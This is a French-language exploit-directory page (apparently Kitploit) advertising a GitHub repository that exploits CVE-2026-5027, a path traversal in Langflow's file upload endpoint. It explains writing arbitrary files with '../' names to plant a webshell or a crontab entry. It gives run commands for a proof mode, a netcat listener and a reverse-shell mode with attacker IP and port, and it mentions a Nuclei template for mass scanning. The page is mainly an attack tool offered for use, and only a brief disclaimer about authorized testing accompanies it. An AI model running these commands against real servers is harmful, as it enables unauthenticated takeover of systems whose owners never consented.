Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-5027 — CVE-2026-5027 | Kitploit
Outils/GitHubGitHub/0xblackash/cve-2026-5027
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHub0xblackash/cve-2026-5027

CVE-2026-5027

CVE-2026-5027

Voir le dépôt
il y a 4 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

🔥 CVE-2026-5027 - Traversée de Chemin Langflow

Vulnérabilité de cybersécurité_ exploit de traversée de chemin

Écriture Arbitraire de Fichier menant à une RCE
Exécution de Code à Distance non authentifiée via Téléchargement de Fichier

CVE CVSS Exploit

📌 Aperçu

Langflow souffre d'une vulnérabilité critique de traversée de chemin dans le point de terminaison de téléchargement de fichier (POST /api/v2/files).

Un attaquant peut envoyer un nom de fichier malveillant contenant des séquences ../ pour écrire des fichiers arbitraires n'importe où sur le système de fichiers du serveur.

Cela mène facilement à une exécution de code à distance complète (RCE) — par exemple en déposant une webshell ou en injectant dans crontab.


🛠️ Fonctionnalités

  • ✅ Exploitation non authentifiée (configurations avec connexion automatique par défaut)
  • ✅ Preuve de concept simple (écrit un fichier test dans /tmp)
  • ✅ Shell inversé complet via cron (Linux)
  • ✅ Modèle Nuclei inclus pour le scan de masse
  • ✅ Profondeur de traversée facile à personnaliser

🚀 Démarrage Rapide

1. Preuve de Concept (Test Sécurisé)

root@kitploit:~
python3 CVE-2026-5027.py -t http://target:7860/ --proof

Sortie attendue si vulnérable:

root@kitploit:~
[+] Success! File written: ../../../tmp/CVE-2026-5027-proof.txt

2. Shell Inversé Complet

root@kitploit:~
# Démarrer l'écouteur
nc -lvnp 4444

# Exécuter l'exploit
python3 CVE-2026-5027.py -t http://target:7860/ --lhost YOUR_IP --lport 4444

📁 Contenu du Dépôt

FichierDescription
CVE-2026-5027.pyExploit principal en Python (PoC + RCE)
CVE-2026-5027.yamlModèle Nuclei pour le scan
README.mdCe fichier

🎯 Exemples d'Utilisation

cve-2026-5027

Mode Preuve

root@kitploit:~
python3 CVE-2026-5027.py -t http://target.com/ --proof

Mode Shell Inversé

root@kitploit:~
python3 CVE-2026-5027.py -t http://target.com/ --lhost 192.168.1.100 --lport 4444

⚠️ Avertissement

Ce dépôt est destiné uniquement à des fins éducatives et de tests de sécurité autorisés.

Utilisez-le de manière responsable et uniquement sur des systèmes pour lesquels vous avez une autorisation explicite de tester.


Fait avec ❤️ pour la communauté red team

Télécharger l’outil